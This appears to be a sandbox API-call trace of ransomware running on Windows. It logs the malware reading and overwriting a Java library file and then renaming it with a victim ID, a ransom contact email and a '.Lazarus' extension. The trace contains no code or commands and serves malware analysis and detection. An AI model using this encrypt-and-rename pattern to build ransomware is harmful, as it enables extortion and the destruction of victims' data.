[0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0094.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0094.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0094.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0094.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.519] AreFileApisANSI () returned 1 [0094.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar", lpUsedDefaultChar=0x0) returned 52 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0094.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.519] AreFileApisANSI () returned 1 [0094.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0094.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46748, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 52 [0094.519] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.520] GetFileType (hFile=0x360) returned 0x1 [0094.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0094.520] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.520] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.520] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.521] CloseHandle (hObject=0x360) returned 1 [0094.521] AreFileApisANSI () returned 1 [0094.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0094.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 52 [0094.521] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.521] GetFileType (hFile=0x360) returned 0x1 [0094.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0094.521] CloseHandle (hObject=0x360) returned 1 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.522] AreFileApisANSI () returned 1 [0094.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0094.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 52 [0094.522] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa7bbd53, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa7bbd53, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa80821a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2e56fa)) returned 1 [0094.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0094.522] AreFileApisANSI () returned 1 [0094.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.523] GetLastError () returned 0x0 [0094.523] SetLastError (dwErrCode=0x0) [0094.523] AreFileApisANSI () returned 1 [0094.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0094.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 52 [0094.523] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.523] GetFileType (hFile=0x360) returned 0x1 [0094.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0094.523] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0094.523] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0094.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0094.526] ReadFile (in: hFile=0x360, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0094.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0094.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0094.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0094.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x954b0 [0094.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0094.527] GetLastError () returned 0x0 [0094.527] SetLastError (dwErrCode=0x0) [0094.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.527] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0094.528] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0094.528] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0094.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0094.528] CloseHandle (hObject=0x360) returned 1 [0094.529] AreFileApisANSI () returned 1 [0094.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0094.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 52 [0094.529] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.529] GetFileType (hFile=0x360) returned 0x1 [0094.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0094.529] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0094.529] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0094.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0094.547] ReadFile (in: hFile=0x360, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0094.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0094.547] GetLastError () returned 0x0 [0094.547] SetLastError (dwErrCode=0x0) [0094.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.548] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0094.548] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0094.548] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0094.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0094.548] CloseHandle (hObject=0x360) returned 1 [0094.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0094.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a98 [0094.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0094.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0094.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0094.549] AreFileApisANSI () returned 1 [0094.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0094.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0094.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar") returned 52 [0094.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 114 [0094.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe4) returned 0x4ebc8 [0094.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=114 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 114 [0094.549] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0094.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.550] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x14983, dwReserved0=0xa70efde0, dwReserved1=0x6df9150f, cFileName="classlist", cAlternateFileName="CLASSL~1")) returned 1 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0094.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0094.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0094.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 